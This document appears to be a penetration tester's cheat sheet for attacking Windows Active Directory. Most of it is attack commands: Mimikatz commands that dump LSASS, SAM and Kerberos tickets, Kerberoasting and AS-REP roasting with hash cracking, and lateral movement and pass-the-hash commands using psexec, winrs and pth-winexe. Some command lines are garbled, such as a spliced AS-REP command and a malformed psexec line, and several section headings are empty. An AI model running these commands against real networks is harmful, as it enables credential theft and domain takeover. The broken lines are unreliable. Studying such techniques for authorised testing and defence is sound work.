Active Directory

When testing active directory our goals should be to:
  • gain a foothold on a machine on the domain and elevate our privileges
  • enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
  • gain access to the domain controller
  • persist on the domain (situation dependent)
Assuming that we've already enumerated the domain, we should now be focused on gathering credentials to move laterally within the domain.

Cached credential retrieval

Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database.


sekurlsa::logonpasswords (dump lsass)
lsadump::sam (dump sam database)
sekurlsa::tickets (to dump tickets stored in memory)
kerberos::list (view cached kerberos tickets for the current user)



If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking.
Extracting SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt
Alternatively, we can use the Invoke-Kerberoast.ps1, to enumerate SPNs, request tickets, and export them in a format ready for cracking.

AS-REP Roasting

The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication.
Searching for AS-REP Roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt domain/user:pass -dc-ip ipaddress -request format john -output.txt
john --format:krb5asrep output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt

Unconstrained delegation

Constrained delegataion


Lateral movement

Moving laterally within a domain is fairly straightforward once you have credentials.

Windows remote management

winrs -remote:hostname -u:username -p:password (command)



PS-EXEC domain/user:password@ipaddress

SMB-EXEC username:password@ipaddress

Pass the hash

Pass the hash allows attackers to authenticate to a remote system using an NTLM hash.
Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place.
Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash
SMBclient -hashes LMHash:NTLMHash domain/user@$ipaddress
PS Exec -hashes :NTLMhash administrator@ipaddress

Overpass the hash

The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication.

Pass the ticket


Golden tickets